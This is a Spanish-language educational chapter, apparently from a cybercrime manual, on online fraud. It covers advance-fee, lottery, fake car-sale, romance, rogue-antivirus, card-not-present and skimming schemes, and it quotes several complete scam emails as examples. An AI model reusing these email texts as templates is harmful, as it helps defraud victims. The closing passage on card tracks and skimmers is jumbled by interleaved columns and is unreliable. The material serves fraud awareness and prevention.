En los distintos tipos de mensaje que se incluyen en los correos electrónicos siempre
se hace referencia a una muy importante cantidad de dinero proveniente de diversas
vías como herencias, subvenciones internacionales, robos, etc. que se encuentra
depositada a disposición del remitente, el cual no puede hacerla efectiva directamente
por distintos motivos quele obligan a solicitar la ayuda del destinatario del correo, a
quien promete una importante comisión a cambio de recibirla en su cuenta bancaria.
Ante la potencial víctima, el autor del correo se puede presentar como familiar de un
dictador del tercer mundo o de un miembro fallecido o detenido de su gobierno, como
político corrupto, como soldado destinado en un conflicto internacional, como empleado
de banca desleal, como una persona de edad avanzada o aquejada de una enfermedad
incurable, etc. En ocasiones, refuerzan su presentación y la historia que en ella cuentan
con un enlace a una publicación aparecida en un medio de comunicación real y de
reconocida solvencia, en el que aparece una noticia presuntamente relacionada con lo
expresado en el correo. En el caso del ejemplo siguiente, se trata de un accidente aéreo
sufrido por un ministro de Kenia.
From: Lacy Kipkalya <lacy.kipkalya@yandex.com>
Date: 16/01/2020 05:37:10
To: (undisclosed recipients)
Subject: Please my dearest help me!

I am writing this mail to you with tears and sorrow from my heart. With due respect, trust and humanity, i
appeal to you to exercise a little patience and read through my letter, i wish to contact you personally for
a long term business relationship and investment assistance in your Country so i feel quite safe dealing
with you in this important business having gone through your remarkable profile, honestly i am writing this
email to you with pains, tears and sorrow from my heart, i will really like to have a good relationship with
you and i have a special reason why i decided to contact you, i decided to contact you due to the urgency
of my situation, My name is Miss Lacy Kipkalya Kones, 23yrs old female and I held from Kenya in East Africa.
My father was the former Kenyan road Minister. He and Assistant Minister of Home Affairs Lorna Laboso
had been on board the Cessna 210, which was headed to Kericho and crashed in a remote area called
Kajong'a, in western Kenya. The plane crashed on the Tuesday 10th, June, 2008.
You can read more about the crash through the below site:
http://edition.cnn.com/2008/WORLD/africa/06/10/kenya.crash/index.html
After the burial of my father, my stepmother and uncle conspired and sold my father's property
to an Italian Expert rate which the shared the money among themselves and live nothing for me. I am
constrained to contact you because of the abuse I am receiving from my wicked stepmother and uncle.
They planned to take away all my late father's treasury and properties from me since the unexpected
death of my beloved Father. Meanwhile i wanted to escape to the USA but they hide away my international
passport and other valuable travelling documents. Luckily they did not discover where i kept my fathers
File which contains important documents. So I decided to run to the refugee camp where i am presently
seeking asylum under the United Nations High Commission for the Refugee here in Ouagadougou, Republic
of Burkina Faso.
One faithful morning, I opened my father's briefcase and found out the documents which he has
deposited huge amount of money in bank in Burkina Faso with my name as the next of kin. I travelled to
Burkina Faso to withdraw the money for a better life so that I can take care of myself and start a new life, on
my arrival, the Bank Director whom I met in person told me that my father's instruction/will to the bank
is that the money would only be release to me when I am married or present a trustee who will help me and
invest the money overseas. I am in search of an honest and reliable person who will help me and stand as
my trustee so that I will present him to the Bank for transfer of the money to his bank account overseas. i
have chosen to contact you after my prayers and I believe that you will not betray my trust. But rather take
me as your own sister.
Although, you may wonder why I am so soon revealing myself to you without knowing you, well I will say
that my mind convinced me that you may be the true person to help me. More so, my father of blessed
memory deposited the sum of (US$11.500, 000) Dollars in Bank with my name as the next of kin. However, I
shall forward you with the necessary documents on confirmation of your acceptance to assist me for the
transfer and statement of the fund in your country. As you will help me in an investment, and i will like to
complete my studies, as i was in my 1year in the university when my beloved father died. It is my intention
to compensate you with 30% of the total money for your services and the balance shall be my capital in
your establishment. As soon as I receive your positive response showing your interest I will put things into
action immediately. In the light of the above. I shall appreciate an urgent message indicating your ability
and willingness to handle this transaction sincerely.
AWAITING YOUR URGENT AND POSITIVE RESPONSE, Please do keep this only to yourself for now untill the bank
will transfer the fund. I beg you not to disclose it till i come over because I am afraid of my wicked stepmother
who has threatened to kill me and have the money alone, I thank God Today that am out from my country
(KENYA) but now In (Burkina Faso) where my father deposited these money with my name as the next of Kin.
I have the documents for the claims.
Yours Sincerely,
Lacy Kipkalya Kones.
Según el mercado al que se dirija el correo, así será el idioma en el que se escriba. Las
traducciones suelen estar hechas con la ayuda de traductores online y, por lo tanto, son
fácilmente detectables por los errores gramaticales que cometen.
De: James Abbah <j_abbah@cantv.net>

Enviado el: lunes, 19 de mayo de 2020 6:06
Para: (receptor no revelado)
Asunto: Confirme este mensaje con urgencia Mi buen amigo,
Saludos a usted
Antes de que yo me presente, me permito informarle que este correo electrónico no es una broma y le
insto a que tratarlo con seriedad. Esta carta debe venir a usted como una sorpresa, pero creo que es sólo
un día en el que las personas se encuentran y se convierten en grandes amigos y socios de negocios. Mi
nombre es Sr. James Abbah.
El gerente de la sucursal de un banco presente aquí en Ghana. Te escribo esta propuesta de buena fe, en
la creencia de que puedo confiar en usted con la información que estoy a punto de revelar a usted. Como
he dicho, tengo una transacción que beneficie a los dos, ya que su ayuda es necesaria como un extranjero.
Que utilizo para trabajar como jefe del departamento de contabilidad en mi oficina central del banco, pero
en diciembre pasado me pidió que tomara la posición de un gerente en una de nuestras sucursales para
reemplazar al anterior que pasó, así que fue como me convertí en el Administrador presente y descubrió
una fortuna.
Al reanudarse el deber, en mi revisión de rutina y hacerse cargo, descubrí una cuenta con una importante
suma de dinero en dólares que ha estado flotando y desaparecidos durante los últimos 4 años. De mi
investigación, descubrí que la rama en la que yo soy el gerente, una ganancia excesiva de un interés
devengados por el dinero depositado por la Comunidad Económica de los Estados comité pago del
contrato, y que el dinero ha sido flotando. De hecho, he puesto este fondo en una cuenta de llamadas PLICA
sin un beneficiario legítimo y que se convertirá en su nombre en cuanto a identificar su interés por escrito.
La cuenta de depósito en garantía llamada es un tipo secreto de la cuenta en mi banco y no otra persona
sabe sobre esta cuenta o cualquier otra cosa que le concierne, la cuenta no tiene otro beneficiario. He
mantenido un estrecho seguimiento de la cuenta desde entonces. A medida que el gerente de la sucursal
del banco, directamente no se puede sacar el dinero sin la ayuda de un extranjero y es por eso que estoy
en contacto con usted para una ayuda para reclamar los fondos y compartirlo conmigo.
Tengo el poder para influir en la liberación de los fondos a cualquier extranjero que viene con el depositante
del dinero, con la información correcta sobre la cuenta, que yo te daré. Su responsabilidad será la de
ayudar a mover los fondos a su país. Va a ser una transferencia de banco a banco y yo tenemos que
asegurar que no existen riesgos involucrados en este negocio. La operación se ejecutará en virtud de un
acuerdo legítimo que le protegerá de cualquier violación de la ley. Si acepta trabajar conmigo, quiero que
indicar cómo desea compartir los fondos en porcentaje, por lo que ambas partes estarán satisfechos.
Ponte en contacto conmigo tan pronto como reciba este mensaje si sentimos que podemos trabajar
juntos, para que podamos entrar en detalles.
Agradeciendo de antemano y que Dios los bendiga. Por favor, tratar con la máxima confidencialidad.
Espero su respuesta urgente.
Saludos, Sr. James Abbah

El primer objetivo buscado con el correo es, simplemente, que alguien conteste. A partir
de ese momento, los estafadores utilizarán todos los argumentos que sean necesarios
para convencer a su interlocutor de lo sencillo y beneficioso que es el negocio propuesto.
En principio no debe realizar ninguna gestión, salvo facilitar un número de cuenta donde
recibir la transferencia y enviar copia de su documentación para realizar los necesarios
procesos burocráticos.
Tras conseguir que se acepte participar en el negocio propuesto, y cuando todo parece
ir bien, se persuade a la víctima para que adelante, en principio, una pequeña cantidad
de dinero con la que obtener algún permiso administrativo necesario para realizar la
transferencia, sobornar a determinados funcionarios, pagar algún impuesto, etc. Si acepta
y paga este primer requerimiento, le pedirán nuevas cantidades de dinero justificándolas
con distintos pagos necesarios para liberar el dinero. Esto se repite hasta que, al final, la
víctima se reconoce como estafada.
From: Bancaja España <payments@bcbanca.es>
Date: June 7, 2020 3:51:38 AM CDT
Subject: ATTENTION: (TAKE NOTE)
BCja Branch, Madrid
7 October 2012
13311 FM 807 Dalhart
Texas 79022,
USA
Sir,
On behalf of the management and the Board of Trustees of this Bank, you are informed that your fund
was meant to be transferred to you and it was insured under high European insurance bond to be in our
treasury and security deposit bureau and we have no right to deduct even a cent from the said beneficiary’s
principal sum. As the said sum has insurance bond place on it by the sending origin you Uncle/Relative Late
Mr. Emmanuel Crabtree. This is to avoid quarreling and misunderstanding with your attorney Andreu Batllo
Carlos with the management of this bank. He is here today in our bank disturbing our management after
a discussion with him. Please advise him. This is your money and we would carry out the transfer once the
fee is paid I promise you that.
You are to pay €6,800.46, for COST OF TRANSFER / TRANSFER FEES, CLEARANCE AND ADMINISTRATIVE FEE. This
to enable a fast procedure towards the release of your fund/money from treasury and security deposit
bureau immediately the above mentioned fees is paid by you, for you to have access to your money.

This charge is mandatory and none deduct able according to banking rule and regulation in our country.
Note: based on the information above you are advised to try and make this payment immediately or
unfailingly, this will enable our bank to credit your nominated bank account immediately this fee is paid as
this is only fee that is delaying your fund. We are sorry for the inconveniences we put to you but you have
to understand us. This order is from the above. There is a charge for foreign transfer of huge sum both local
both local and international.
You are now to start making all the necessary arrangement on how you make the above payment
immediately to avoid confiscation of your total sum by the Spanish government based on UN and EU
banking policy that is applicable until the date.
Thanks for your understanding and cooperation
Yours faithfully,
Dr. Evaristo Muñoz Marti
Bancaja Bank
Calle De Alcalá, 522 1a-28027 Madrid, Spain
En algunas de estas estafas realmente elaboradas, los delincuentes llegan a crear una
falsa página web con la apariencia de pertenecer a un banco real con domicilio social
en algún país occidental. Como parte del engaño, y para ganarse la confianza de la
potencial víctima, le informan de que han trasferido a una cuenta abierta a su nombre
en esa entidad financiera una importantísima cantidad de dinero (generalmente varios
millones de dólares). Para comprobarlo, solo tiene que acceder a través de Internet con
las claves que le facilitan.
La víctima, convencida de disponer de esa cantidad de dinero en una entidad de

toda solvencia, no pone reparos a realizar las disposiciones económicas que le piden
relacionadas con trámites, comisiones, impuestos, etc. a fin de poder liberar el dinero y
transferirlo a su entidad bancaria.

PREMIO DE LA LOTERÍA
Ilustración 18. Esatafa de la lotería (I).
Se trata de una variante del anterior tipo de estafa. En lugar de una importante cantidad
de dinero que alguien quiere compartir, el correo electrónico que se recibe informa de
que se ha ganado un premio de la lotería nacional (si bien existen otros países a cuyas
loterías se hace referencia en las estafas, sin duda la lotería de España es la más utilizada
como reclamo) o de otra lotería gestionada por una empresa privada.
From: vnnlott876@wowway.com
Date: 10/2/2020 4:04:41 A.M. Eastern Daylight Time
Subject: Good Day,
Good Day,

Your Email ID has won you the award sum of €1.Million (Euros)in the Ongoing Online Email Award held in
Madrid Spain on the 29th of September 2012.
WInning Informations!!!
BATCH NUMBER: 09049-6657-2002)
LOTTERY DATE :(29TH OF SEPTEMBER 2012)
PLACE:(Madrid Spain).
For the Claim Process do send name and Contact Information also state the mode of payment you will
prefer.
1.Cheque
2.Bank Transfer
Congratulations!!!
Mrs. Helena Pirlo.
Ilustración 19. Estafa de la lotería (II)

De: essoh georrges <familleessohgeorges@hotmail.fr>
Enviado el: sábado, 22 de septiembre de 2020 7:45
Asunto: A SU ATENCIÓN
A SU ATENCIÓN,
LE CONTACTAMOS POR ESTA PRESENTAMOS PARA INFORMARLE DE SU GANANCIA A MICROSOFT LOTERÍA SOCIEDAD.
ESTO NO ES UN SPAM NI UN VIRUS, QUIERE ENCUENTRAN EN FICHERO LIGA LA NOTIFICACIÓN DE SU GANANCIA DE

250.000€ EN EL ÚLTIMO SORTEO.
DESPUÉS DE COMPROBACIÓN DE LA NOTIFICACIÓN DE SU GANANCIA EN DOCUMENTO ADJUNTO, QUIERE PONERSE

EN CONTACTO CON EL ABOGADO ACREDITA ABAJO PARA EL PROCEDIMIENTO DE RETIRADA DE SU GANANCIA.
CONTACTO DEL ABOGADO:
GABINETE DE ESTUDIO JURÍDICO DE MAESTRO ALFRED STANKOVIC
ABOGADO ACREDITA A MICROSOFT LOTERÍA SOCIEDAD
MAESTRO ALFRED STANKOVIC
MAIL: maitre.alfredstankovic@list.ru
TELF: +7926(778)732
CORDIALMENTE
Para que la víctima crea realmente que ha sido agraciada con un sorteo en el que ni
siguiera ha participado, junto con el correo electrónico se envían distintos documentos,
evidentemente falsificados, firmados por supuestos responsables de organismos oficiales
y en los que se informa de la veracidad del premio y de los pasos que ha de seguir para
poder hacer efectiva la cantidad ganada en la lotería.

Ilustración 20. Documento falsificado para la estafa de la lotería.
VENTA DE VEHÍCULOS A TRAVÉS DE INTERNET
A través de las páginas de venta o subasta online se materializa la inmensa mayoría de

las ciberestafas. Entre las distintas razones que justifica este hecho destaca, sin duda, la
facilidad en su comisión, ya que únicamente se ha de publicar un anuncio en uno de los
muchísimos sitios web que facilitan este tipo de comercio entre particulares y esperar a
que la víctima se interese por el producto ofertado.
Cualquier objeto que se anuncie tiene su potencial comprador. Solamente es preciso

conocer cómo, de qué manera y a qué precio presentar el producto para que sea
atractivo. Generalmente, lo que suelen realizar los estafadores no es sino copiar un anuncio
auténtico y publicarlo literalmente en otro servicio online con sus datos de contacto.
Como se ha dicho, todo tipo de objetos pueden servir para estafar, ya sean anuncios
de computadoras, bicicletas, muebles, equipos de música, discos, robots de cocina,
juguetes, etc. Además, también se sirven de los anuncios online para estafar en servicios
ofertados, como son los alquileres de pisos, estancias en casas rurales, hoteles o, de
forma global, servicios de vacaciones.
No obstante, quizás las estafas más recurrentes y las que se han mantenido activas desde
hace más tiempo son las relacionadas con las ventas de vehículos a través de páginas
especializadas en estos tipos de anuncios. De manera esquemática, estas estafas siguen
el siguiente patrón.
Primero publican un anuncio en un medio especializado en compraventa de vehículos.

El anuncio incluye fotografías del producto supuestamente ofertado, así como una
descripción sobre su estado y características técnicas. Con mucha frecuencia, el anuncio
es una copia de una oferta de venta publicada por el legítimo propietario del vehículo y los
ciberestafadores han contactado con este haciéndose pasar por personas interesadas
en la compra. Con esta excusa le han pedido copia escaneada de la documentación del
vehículo. Esto lo hacen en previsión de que las víctimas de su estafa se la soliciten a ellos,
como prueba de que realmente son sus dueños.
Ilustración 21. Anuncio falso de la venta de un vehículo.
El anuncio publicado por los estafadores se caracteriza en que el precio de venta es

sustancialmente inferior al que tendría en el mercado, con lo que se garantizan atraer a
un número elevado de potenciales clientes.
Las medidas de precaución que toman los estafadores a la hora de publicar los anuncios
hacen que no sea fácil averiguar desde qué lugar físico concreto se ha realizado la
publicación, lo que evita su identificación. El pago por el anuncio a los gestores de la
página web, en el caso de ser requerido, se realiza a cargo de tarjetas bancarias cuyas
numeraciones han sido ilícitamente obtenidas.
Generalmente, un comprador potencial de vehículos conoce el mercado y la horquilla

de precios en que se mueve cada marca y modelo. No obstante, cuando encuentra un
vehículo a un precio interesante, suele enviar un correo pidiendo más información y la
confirmación del precio. Como contestación suele recibir un mensaje electrónico en el
que el vendedor le describe los motivos que le hacen vender el coche a ese precio tan
bajo. Suele tratarse de cuestiones profesionales o personales las que han llevado al
dueño del vehículo a residir en un país extranjero (en la mayoría de las estafas de este
tipo, el autor dice encontrarse en Reino Unido, lo que le da otro argumento para querer
vender un vehículo español, con el volante a la izquierda) donde no utiliza el coche y, por
lo tanto, necesita venderlo.

De: (remitente no revelado)
Enviado el: lunes, 18 de marzo de 2020 22:22
Asunto:2002 Volkswagen Golf 1.9 TDI GTI, Ed.Especial, 150 CV, 119.000 Km, Diesel, Gris, 1.500 Euros
Buenas, Perdona por tardar en responder. Mi nombre es xxxxx xxxxx xxxxxxxx con DNI xxxxxxxxx. Vendo el coche
porque me he casado con un inglés y nos hemos mudado en Inglaterra. Ya tenemos un coche nacional
para nosotros y no puedo tener el otro también. Estoy embarazada y en estos momentos estoy en una
maternidad Inglesa. Voy a dar la luz muy pronto. El precio es barato porque necesito véndelo muy rápido.
Voy a nacer y el dinero nos viene muy bien después. El coche lo tengo aquí conmigo en Inglaterra. El coche
es nacional con matricula española, tiene todo al día. Impuestos y revisiones. No tiene ningún defecto. Es
perfecto de motor, chapa y pintura. Por razones personales y medicales e dejado el coche en custodia de
una empresa de transporte local localizada en Londres - Inglaterra. Ellos se encargan de transporte, pago y
cambio de nombre. Los gastos de transporte los pago yo y el cambio de nombre esta incluido en el precio
final de venta. Usted tendrás que pagar solo el precio del coche y nada más. Después que el comprador
recibe el coche tiene 48 horas para la comprobación del coche y de los documentos. Si después de las
48 horas el comprador decidiera de no comprar el coche, la empresa de transporte va a restituirme el
coche sin ningún gasto o compromiso para el comprador. Tengo confianza en lo que vendo y soy 100%
segura que el coche está en perfecto estado. El coche ya lo tiene la empresa de transporte. La inspección
del coche y de los documentos esta completa y no hay ninguna problema. El pago por el coche se hace
en efectivo o a través de transferencia. Usted decideras el momento de la entrega. Pero en el momento
cuando voy a enviar los datos del comprador a la empresa de transporte para empezar los tramites, ellos
van a pedir una confirmación que tienes el dinero en efectivo para hacer la compra. Otra vez, EL PAGO
DEL COCHE SE HACE SOLO DESPUES QUE USTED RECIBES Y COMPRUEBAS EL COCHE Y LOS DOCUMENTOS. NO
ANTES. Cualquier gasto para esta confirma que pide la empresa de transporte lo pago yo. Quiero hacer
una transacción rápida y segura para los dos. Si estas de acuerdo con el procedimiento mándame los
siguientes datos para poder empezar los tramites:
Nombre: Apellido: Calle y Numero: Código Postal: Ciudad y País Número de DNI: Número de Teléfono. En
cuanto tenga sus datos voy a contactar con la empresa y ellos se pondrán en contacto telefónico y por
email con usted para enviar los pasos a seguir y finalizar la compra.
Descripcion del coche:
2002 Volkswagen Golf 1.9 TDI GTI, Ed.Especial, 150 CV, 119.000 Km, Diesel, Gris, 1.500 Euros
Vehículo en perfecto estado, cambio por 4 puertas por familia, se puede llevar a revisar, todas revisiones,
correa, etc. en concesionario oficial, mejor ver para juzgar.
El comprador no puede ver el vehículo porque se encuentra en el extranjero. Esto es un

inconveniente lógico y por ese motivo el vendedor ofrece la posibilidad de realizar la
operación a través de una empresa escrow. Este tipo de empresas existen y centran su
actividad empresarial en la realización de labores de intermediación entre compradores
y vendedores legítimos. Esta intermediación, de manera simple, se puede resumir en los
siguientes puntos:

• Tanto el comprador de un producto como el vendedor están de acuerdo
en el precio y las condiciones y deciden utilizar el servicio de una empresa
intermediaria con la que contactan y acuerdan el servicio.
• El comprador envía el dinero pactado como precio por el producto a la
empresa escrow.
• Una vez que el dinero está en poder de la empresa, el vendedor envía a esta
la mercancía. La empresa escrow comprueba el producto y garantiza su
llegada al comprador.
• Ya en su poder, el comprador dispone de un tiempo previamente establecido
para proceder a la inspección de la mercancía y puede aceptarla o
rechazarla si no cumpliese con las condiciones del contrato.
• Si todo marcha conforme a lo establecido, la empresa escrow transfiere
al vendedor el pago efectuado por el comprador. De esta manera, se
completa el intercambio comercial.
• Con este método se consigue que tanto el vendedor como el comprador
estén seguros del éxito de la operación y se evitan potenciales estafas
o incumplimientos de contratos. Además, si es necesario, se garantiza el
anonimato del vendedor.
Volviendo a los estafadores especializados en las supuestas ventas de vehículos a través

de Internet, como se ha dicho, proponen al comprador el envío del vehículo a través
de una empresa escrow, si bien no tienen que realizar ningún pago hasta que le haya
llegado el coche y compruebe que todo está correcto. De no ser así, pueden devolver el
coche sin ningún gasto, ya que todo gasto será asumido por el vendedor. Para mayores
garantías, será la empresa directamente la que se comunicará con el comprador y le
informará en todo momento del lugar físico en el que se encuentra el vehículo.
Efectivamente, el comprador recibe al poco tiempo un correo de una supuesta empresa

escrow (evidentemente se trata de una falsa empresa, cuya existencia se limita a la
creación de una web), donde le informa que tienen en su poder el coche y que se inicia
el traslado. Para que el comprador tenga información del lugar donde el vehículo se
encuentra en cada momento, le envían un enlace web a una página a la que puede
acceder con un nombre de usuario y una contraseña (que también le facilitan) y donde
se le comunica la ubicación del vehículo (la falsa web va siendo modificada para que
aparezca la información que en cada momento interesa a los estafadores).
Poco tiempo después, el comprador recibe otro correo de la supuesta empresa

escrow donde le comentan que el vehículo ha tenido algún problema administrativo.
Generalmente, se trata de que no puede cruzar una determinada frontera sino se satisface
el pago de un impuesto. Para abonarlo, el comprador debe enviar el importe solicitado a
través de una empresa de envío internacional de dinero.
Ya satisfecho el pago, poco después volverá a recibir otro correo donde nuevamente se
le requiere otro pago para hacer frente a cualquier otro trámite. En el caso de abonar
este segundo requerimiento, habrá un tercero, un cuarto y así sucesivamente hasta que
el comprador comprenda que se ha convertido en una víctima de un delito de estafa.

Si bien el precio de venta del vehículo es relativamente bajo, los criminales no pretenden
en ningún momento cobrarlo. Su objetivo se dirige a obtener las pequeñas cantidades
de dinero exigidas por su falsa empresa escrow. Multiplicadas por un número muy
considerable de víctimas, les hace embolsarse enormes cantidades de dinero con la
puesta en práctica de una estafa muy simple, de fácil preparación y ejecución.
ESTAFAS EN RELACIONES PERSONALES: ROMANCESCAM
Las relaciones personales también han encontrado en la red y en las comunicaciones

una nueva vía en la que desarrollarse. Existen páginas web especializadas en compartir
aficiones, experiencias, ilusiones o en las que buscar distintos tipos de relaciones
personales.
Ilustración 22. Perfil de usuario.
La información que los usuarios vuelcan en estos tipos de páginas web les describe
plenamente: muestran su edad, sus aficiones, sus pasiones, sus gustos, sus costumbres,
la existencia o no de familia y su relación con ella, su nivel económico, sus creencias
religiosas y un sinfín de datos identificativos de su carácter. Con un poco de ingeniería
social estos datos pueden ser utilizados por los delincuentes para idear, planificar,
desarrollar y finalmente consumar una estafa personalizada.
Los estafadores especializados en el romancescam saben que, para obtener dinero de

este tipo de estafas, han de actuar con organización, cautela y paciencia. El primer paso
que deben dar es contactar con las futuras víctimas, para lo que pueden optar por dos
vías.
Pueden ser activos en su búsqueda, enviando correos electrónicos e iniciando, por lo

tanto, la relación epistolar; o, por el contrario, pueden publicar anuncios y esperar a que
sean las propias víctimas las que se pongan en contacto con los estafadores.
Si siguen la primera vía, necesitan obtener direcciones de e-mail, actuales y activas, a

las que enviar los correos. Las que tienen más valor y resultan de mayor interés para los
ciberestafadores son las de los usuarios registrados en páginas web especializadas en
relaciones personales. Pueden conseguirlas de manera artesanal, es decir, una a una o
comprando a organizaciones especializadas en hacking las bases de datos de clientes
de alguna de estas páginas, que previamente han sido robadas.
La otra vía, como se ha citado, consiste en publicar en las páginas de contactos perfiles
que resulten atractivos, para que de esta manera sean otras personas las que deseen
iniciar una relación. Las cuotas o pagos que este tipo de páginas suele solicitar para
inscribirse y utilizar sus servicios son pagadas utilizando los datos de tarjetas de crédito
robadas y compradas en el mercado del cibercrimen.
Las fotografías que se incluyen en los falsos perfiles pueden ser sacadas de Internet,
generalmente de páginas de modelos o de redes sociales. No obstante, en cada vez más
ocasiones, son imágenes de personas reales relacionadas con la organización criminal
que se prestan a fotografiarse con el fin de propiciar la estafa a cambio de dinero. El
motivo por el que esta opción se está imponiendo es debido a que, al extenderse este
tipo de estafas y consecuentemente existir abundantes advertencias en foros y webs,
las personas que contactan a través de estas páginas suelen desconfiar inicialmente y
piden a modo de prueba fotografías personalizadas para comprobar la veracidad de la
amistad y la existencia de la persona contactada.
No solo son perfiles de mujeres los utilizados para las estafas relacionadas con
romancescam; con cada vez más frecuencia, los perfiles que se utilizan como ganchos
para las estafas son de hombres interesados en conocer mujeres para iniciar una relación
seria y formal.
Cuando las futuras víctimas insisten en mantener conversaciones telefónicas o a

través de cualquier programa que permita las llamadas a través de Internet, como es
el caso de Skype, las organizaciones cuentan con personas dispuestas a entablar estas
comunicaciones, quienes siguen un guion preestablecido a fin de no desvirtuar la imagen
trasmitida con los correos electrónicos.

Una vez establecido el contacto inicial, poco a poco van compartiendo supuestas
experiencias, coincidiendo en gustos, intercambiando opiniones sobre todo tipo de
cuestiones y, con ello, los estafadores van obteniendo más datos personales con los que
ir planeando qué tipo de estafa es la más adecuada.
FALSOS ANTIVIRUS: ROGUES

Además de ser uno de los métodos de estafa más difundidos, es uno de los más efectivos.
Se conoce como rogue a un tipo concreto de malware que, generalmente, se instala de
manera oculta durante la navegación por webs poco seguras o a través de descargas
de ficheros desde páginas de descargas directas o programas P2P.
El malware se instala en el equipo y genera la aparición repetitiva de mensajes
emergentes(pop-ups), en los que se puede leer un texto que advierte de la existencia de
un peligroso y destructivo virus que ha infectado la computadora.
Ilustración 24. Advertencia de un falso antivirus
El usuario puede, desde la misma ventana emergente, descargar un software antivirus

que eliminará el malware. Tras acceder a su descarga e instalación, el nuevo programa
inicia un presunto chequeo de los archivos del sistema y confirma la existencia del virus
detectado, junto con otros potenciales peligros para el sistema. Además, invita a comprar
la licencia del producto que permitirá descargar la versión completa del programa
antivirus. Para ello, dirige a una web donde puede realizar la compra mediante tarjeta
bancaria.

Ilustración 25. Chequeo de un falso antivirus.
El fraude consiste en que ni el virus detectado existe realmente ni el antivirus que se

pretende que la víctima descargue tras su compra es tal herramienta de seguridad.
2.3. Fraude en medios de pago físico

Este fraude está tipificado en nuestro Código Penal como estafa en la letra c del artículo
248: «los que utilizando tarjetas de crédito o débito, o cheques de viaje, o los datos obrantes
en cualquiera de ellos, realicen operaciones de cualquier clase en perjuicio de su titular
o de un tercero».
CARD NO PRESENT FRAUD (CNP FRAUD)
En los apartados relacionados con el phishing, se ha descrito que el objetivo de los

cibercriminales era conseguir la información necesaria para el acceso a los servicios
de banca electrónica de sus víctimas, esencialmente nombre de usuario y contraseña,
además de otras claves con las que poder realizar posteriores transferencias fraudulentas.
Junto con los datos de acceso a la banca online, otro de los objetivos a los que los
delincuentes le dedican un considerable esfuerzo mediante diversos vectores de ataque
(como el diseño, creación y difusión de malware especifico o la utilización de redes
botnets) es la información que aparece físicamente grabada en las tarjetas bancarias:
la numeración de la tarjeta, la fecha de caducidad y el código de verificación, también
conocido como CVC, CVC2 o CID (se trata de un número de tres o cuatro cifras que se
solicita a fin de comprobar que se dispone físicamente de la tarjeta bancaria durante la
realización de procesos de compra a través de plataformas electrónicas o telefónicas).

Con estos datos los ciberdelincuentes pueden realizar compras de productos o servicios
a través de Internet o mediante llamadas telefónicas. A esta actividad delictiva se le
conoce como carding o card no present fraud.
La vía más habitual para la obtención de estos datos es su compra en mercados ilegales
a los que se accede mediante determinadas páginas web, foros o chats específicamente
dedicados a su comercio. Se describirá detalladamente cómo se distribuye esta
información en el siguiente punto dedicado al skimming.
Los productos que suelen adquirir los delincuentes mediante la utilización de técnicas
de CNP fraud suelen ser aquellos que pueden ser fácil y rápidamente vendidos, como
equipos electrónicos, informáticos o teléfonos. También suelen utilizar este tipo de fraude
para la compra de billetes de avión u otro tipo de transporte.
Normalmente, al efectuar la compra a través de Internet, indican como lugar de entrega

de los productos domicilios no relacionados con los autores, en cuyos alrededores
esperan la llegada del transportista al que se identifican con el nombre ficticio facilitado
durante el proceso de compra, y así logran la entrega del paquete. En otras ocasiones,
los recogen directamente en las oficinas de la compañía distribuidora, en la que se
identifican con documentación falsa.
Para este tipo de fraude suelen utilizar numeraciones de tarjetas bancarias extranjeras
con la finalidad de alargar al máximo su utilización efectiva, conocedores del dilatado
tiempo que transcurre entre la materialización de una compra, el conocimiento efectivo
del fraude por su titular y el conocimiento por las autoridades de la estafa.
SKIMMING
Mucho más complejo es realizar una copia de la información que no aparece a simple
vista en las tarjetas bancarias y, por lo tanto, al desconocerla su usuario legítimo, no
puede ser obtenida por manipulación informática del equipo de la víctima o mediante
técnicas de ingeniería social.
La clonación de la tarjeta consiste en obtener, en primer lugar, toda la información

almacenada en la banda magnética y, posteriormente, copiarla en otra tarjeta con la
que realizar compras en establecimientos físicos y retirar dinero en cajeros automáticos,
como si de la original se tratase. Para ello es necesario conocer el número PIN de la tarjeta
clonada.
Para esta actividad delictiva descrita se hace necesaria la utilización de elementos

electrónicos especialmente diseñados, además de conocimientos específicos y

pertenencia a una organización con capacidad de actuación internacional. Al conjunto
de técnicas y procedimientos para llegar a conseguir la clonación de una tarjeta se le
conoce como skimming.
Las organizaciones que se especializan en esta actividad concreta de estafa conocen

perfectamente las características concretas de cada tipo de tarjeta, los límites
económicos que permiten retirar periódicamente, las medidas de seguridad con que
cuentan y, sobre todo, cómo están técnicamente diseñadas.
Igualmente, tienen un amplio conocimiento sobre el funcionamiento de los cajeros

automáticos y de otros dispositivos a través de los cuales se puede operar con una
tarjeta bancaria.
Toda la actividad que rodea al skimming, desde el diseño y creación de los elementos
electrónicos necesarios para la obtención de la información de las tarjetas hasta la
retirada efectiva de dinero o la compra física de algún producto, podemos englobarla
dentro del término ciclo del skimming, donde estarían incluidas la obtención de los datos
de las tarjetas, su duplicación y finalmente su utilización física en establecimientos
comerciales.
CICLO DEL SKIMMING
OBTENCIÓN DE LOS DATOS DE LAS TARJETAS
Las técnicas que utilizan los skimmers se dirigen a conseguir dos tipos de datos distintos,
pero complementarios y necesarios para la utilización de una tarjeta bancaria. Estos son
los datos que se incluyen en la banda magnética y el número PIN que permite utilizar la
tarjeta.
La banda magnética: las características de las bandas magnéticas de las tarjetas

se recogen detalladamente en la normativa internacional ISO, concretamente en las
7810, 7811 y 7813. En la 7810 se definen las características que deben cumplir las tarjetas
destinadas a identificación y transacciones económicas (características físicas,
técnicas y procedimiento de registro). La norma ISO 7811 define en sus apartados 1, 2, 3,
4 y 5 la zona donde se troquela en relieve, las características que definen a la banda
magnética, la localización de las distintas pistas en la banda magnética y su capacidad
de almacenamiento. Se dividen en tres pistas con la siguiente estructura:
• Pista 1: donde se pueden incluir 79 caracteres alfanuméricos. Contiene

esencialmente datos del código de país, el nombre del titular de la tarjeta, la
fecha de su caducidad, el código de servicio y otros datos discrecionales en
donde se puede incluir información variada. Los datos que aparecen en relieve

en la tarjeta deben coincidir con organizaciones criminales que cuentan
los incluidos en esta pista. con entidad suficiente como para disponer
de equipos humanos de desarrollo que
• Pista 2: permite el
estudian meticulosamente cada tipo
almacenamiento de 40
concreto de cajero automático. Para
caracteres numéricos. Entre
cada uno, diseñan específicamente los
otros datos, incluye el número
módulos concretos que necesitan instalar,
de cuenta principal.
de manera que se integren perfectamente
• Pista 3: puede almacenar como parte de la estructura del cajero
107 caracteres numéricos y se sin despertar ninguna sospecha en los
emplea principalmente para empleados o en los clientes.
almacenar aquella información
que cambia con frecuencia o
que es posible que lo haga.
• Tanto la pista 1 como la 2 son
únicamente de lectura, por lo
que, una vez grabadas, no se
puede alterar su contenido.
• El número PIN: no aparece en
ninguna de las pistas y debe
ser únicamente conocido por el
titular de la tarjeta bancaria. Ilustración 26. Falsa boca para tarjetas
